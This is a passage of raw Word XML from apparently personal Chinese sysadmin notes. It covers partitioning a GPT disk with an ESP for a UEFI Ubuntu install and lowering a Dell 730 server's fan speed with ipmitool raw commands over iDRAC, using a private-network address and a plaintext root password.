        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A74982" w14:textId="6B7831D8" w:rsidR="00104E9D" w:rsidRDefault="000F63C1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc159779632"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区必须有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESP(</w:t>
      </w:r>
      <w:r>
        <w:t>efi)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="0CDD4D86" w14:textId="77777777" w:rsidR="00104E9D" w:rsidRDefault="00104E9D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42966995" w14:textId="66EB4679" w:rsidR="00104E9D" w:rsidRDefault="00EC2ECD" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装的时候我在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中选择</w:t>
      </w:r>
      <w:r w:rsidR="006E52A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UEFI</w:t>
      </w:r>
      <w:r w:rsidR="006E52A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动，</w:t>
      </w:r>
      <w:r w:rsidR="00B3790C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidR="00B3790C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00B3790C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，</w:t>
      </w:r>
      <w:r w:rsidR="00AB1EC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要你手动切到安装界面之外的其他</w:t>
      </w:r>
      <w:r w:rsidR="00AB1EC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TTY</w:t>
      </w:r>
      <w:r w:rsidR="00AB1EC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00590596">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r w:rsidR="00590596">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区一下。</w:t>
      </w:r>
      <w:r w:rsidR="00A32A49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分完区后，再</w:t>
      </w:r>
      <w:r w:rsidR="00A32A49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fid</w:t>
      </w:r>
      <w:r w:rsidR="00A32A49">
        <w:t xml:space="preserve">isk  t </w:t>
      </w:r>
      <w:r w:rsidR="00A32A49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标识对应的分区是</w:t>
      </w:r>
      <w:r w:rsidR="00A32A49">
        <w:t xml:space="preserve"> Linux swap, boot efi, linux ext4</w:t>
      </w:r>
      <w:r w:rsidR="00A32A49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00EB4794">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区标识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28070F" w14:textId="77777777" w:rsidR="00104E9D" w:rsidRDefault="00104E9D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3E786B" w14:textId="2A8807B3" w:rsidR="00104E9D" w:rsidRDefault="00A468E9" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区，按照惯例第一个分区需要为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>称呼为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>称呼为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="0059347C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，大小</w:t>
      </w:r>
      <w:r w:rsidR="0059347C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="0059347C">
        <w:t>12MB</w:t>
      </w:r>
      <w:r w:rsidR="0059347C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> efi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区</w:t>
      </w:r>
      <w:r w:rsidR="005D2F5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 32,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该分区挂载在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>boot/efi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78414788" w14:textId="77777777" w:rsidR="00104E9D" w:rsidRPr="0059347C" w:rsidRDefault="00104E9D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C5D3F4" w14:textId="1FD32B53" w:rsidR="00792AD5" w:rsidRDefault="007F3A87" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做完上述动作，</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再切回</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tty</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装</w:t>
      </w:r>
      <w:r w:rsidR="008021C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，设置大磁盘为</w:t>
      </w:r>
      <w:r w:rsidR="008021C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="008021C8">
        <w:t>oot device</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，才能顺利挂载</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>swap</w:t>
      </w:r>
      <w:r w:rsidR="00002310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94440E" w14:textId="77777777" w:rsidR="00792AD5" w:rsidRDefault="00792AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5774397C" w14:textId="77777777" w:rsidR="00A54519" w:rsidRDefault="00A54519" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE1A607" w14:textId="0138C666" w:rsidR="00A54519" w:rsidRDefault="00A54519" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc159779633"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>案例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>ell 730</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风扇速度调整</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="73BB822F" w14:textId="0A89A47F" w:rsidR="00A54519" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥的文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5793B30E" w14:textId="3D16A54E" w:rsidR="00A54519" w:rsidRDefault="005C3194" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005C3194">
        <w:t>https://h38ozbw2bw.feishu.cn/docx/Jonpd4cZmoZW2Sx0RrVcXGRsnOc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611BE6F7" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>现象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06787743" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dell emc </w:t>
      </w:r>
      <w:r>
        <w:t>风扇转速</w:t>
      </w:r>
      <w:r>
        <w:t>100%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683FD89" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>730</w:t>
      </w:r>
      <w:r>
        <w:t>安装的显卡为</w:t>
      </w:r>
      <w:r>
        <w:t>A2</w:t>
      </w:r>
      <w:r>
        <w:t>，非</w:t>
      </w:r>
      <w:r>
        <w:t>dell</w:t>
      </w:r>
      <w:r>
        <w:t>官方指定的显卡，</w:t>
      </w:r>
      <w:r>
        <w:t>bios</w:t>
      </w:r>
      <w:r>
        <w:t>主动调速速率为</w:t>
      </w:r>
      <w:r>
        <w:t>100%</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:t>占用率低下，但是风扇全功率运行，声音一言难尽。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBBA86" w14:textId="77777777" w:rsidR="006501E3" w:rsidRDefault="006501E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A25374" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>环境说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E684516" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Idrac ip:192.168.3.250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512F1C75" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果有多余网线，可以直接接入到公司网络，如果不方便，将自己的电脑以太网网口配置为如下，可以用网线和服务器直连：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17638894" w14:textId="10D55180" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F6D122" wp14:editId="4A433F04">
            <wp:extent cx="5274310" cy="6471920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="2053067028" name="图片 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67028" name="图片 4" descr="图形用户界面&#10;&#10;描述已自动生成"/>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6471920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B4199" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="00DA3F36">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>解决方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73906E62" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>ipmitool</w:t>
      </w:r>
      <w:r>
        <w:t>手动调速</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7A3B6" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ipmitool</w:t>
      </w:r>
      <w:r>
        <w:t>安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F802533" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>apt install ipmitool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72201C8C" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:t>地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/ipmitool/ipmitool</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54F40CFC" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://www.dell.com/support/home/zh-cn/drivers/driversdetails?driverid=m63f3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31A30F91" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>调速命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5798F65B" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>首先要关闭风扇自动调速功能，否则我们手动设置的转速是不会生效的。最后的</w:t>
      </w:r>
      <w:r>
        <w:t>0x00</w:t>
      </w:r>
      <w:r>
        <w:t>表示关闭自动调速，</w:t>
      </w:r>
      <w:r>
        <w:t>0x01</w:t>
      </w:r>
      <w:r>
        <w:t>表示开启自动调速。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FE23E" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>ipmitool -I lanplus -H 192.168.3.250 -U root -P 1qaz@WSX raw 0x30 0x30 0x01 0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22072E8E" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>关闭自动调速之后，我们就可以按照我们自己的意愿来调整转速了，我这边设置为</w:t>
      </w:r>
      <w:r>
        <w:t>50%</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891C2C0" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>ipmitool -I lanplus -H 192.168.3.250 -U root -P 1qaz@WSX raw 0x30 0x30 0x02 0xff 0x32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8E5F6" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>最后的</w:t>
      </w:r>
      <w:r>
        <w:t>0x0a</w:t>
      </w:r>
      <w:r>
        <w:t>表示转速的百分比的十六进制，</w:t>
      </w:r>
      <w:r>
        <w:t>0a</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>10%</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>0f</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>15%</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB00A2" w14:textId="0B75E932" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC1ACC3" wp14:editId="71740878">
            <wp:extent cx="5274310" cy="2681605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="210581962" name="图片 3" descr="图形用户界面, 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1962" name="图片 3" descr="图形用户界面, 表格&#10;&#10;中度可信度描述已自动生成"/>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681605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE420C5" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>通过调整发现，转速确实低了，之前一直稳定在</w:t>
      </w:r>
      <w:r>
        <w:t>20%-25%</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>5000+</w:t>
      </w:r>
      <w:r>
        <w:t>转）左右，功耗大概在</w:t>
      </w:r>
      <w:r>
        <w:t>170w</w:t>
      </w:r>
      <w:r>
        <w:t>。通过调低风扇转速，不仅静音了，还降低了功耗。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9D7D9" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、不是永久设置，服务器关闭电源，再次插上电源则需要重新调整。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A4EBC" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、如果是跑应用，为了防止烧显卡，建议直接</w:t>
      </w:r>
      <w:r>
        <w:t>100%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B7743" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>、配置一下邮件预警，当温度到达一定程度，主动发送邮件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB0DA5" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334757A5" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>写个脚本，使用</w:t>
      </w:r>
      <w:r>
        <w:t>ipmitool</w:t>
      </w:r>
      <w:r>
        <w:t>实时获取</w:t>
      </w:r>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>gpu</w:t>
      </w:r>
      <w:r>
        <w:t>温度，当超过阈值，调用</w:t>
      </w:r>
      <w:r>
        <w:t>ipmitool</w:t>
      </w:r>
      <w:r>
        <w:t>自动调速</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA3393" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6399780D" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F68E9" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Error: Unable to establish IPMI v2 / RMCP+ session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D51BD" w14:textId="77777777" w:rsidR="00FF7D68" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>原因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88727C" w14:textId="4617D4D9" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、用户名或者密码错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CCF99" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、未启用</w:t>
      </w:r>
      <w:r>
        <w:t>ipml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A86A2" w14:textId="77777777" w:rsidR="00FF7D68" w:rsidRDefault="00FF7D68" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D4DE2D" w14:textId="00458F63" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>解决：</w:t>
      </w:r>
    </w:p>
